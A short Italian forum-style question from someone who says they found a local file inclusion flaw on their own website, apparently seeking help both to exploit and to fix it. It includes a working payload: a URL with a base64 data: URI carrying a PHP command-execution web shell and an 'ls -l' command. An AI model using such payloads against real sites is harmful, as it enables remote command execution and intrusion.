Ho trovato LFI nel mio sito Web e ho provato a sfruttarlo, ma quando uso php: // input o data: // non funziona, non riesco a ottenere la shell.
Esempio: .index.php?lang=data:;base64,PD9zeXN0ZW0oJF9HRVRbJ3gnXSk7Pz4=&x=ls -l
Ho trovato <?system($_GET['x']);?>
stampato nel codice sorgente della pagina (ctrl + f)
-
Come posso sfruttarlo?
-
Come posso risolverlo?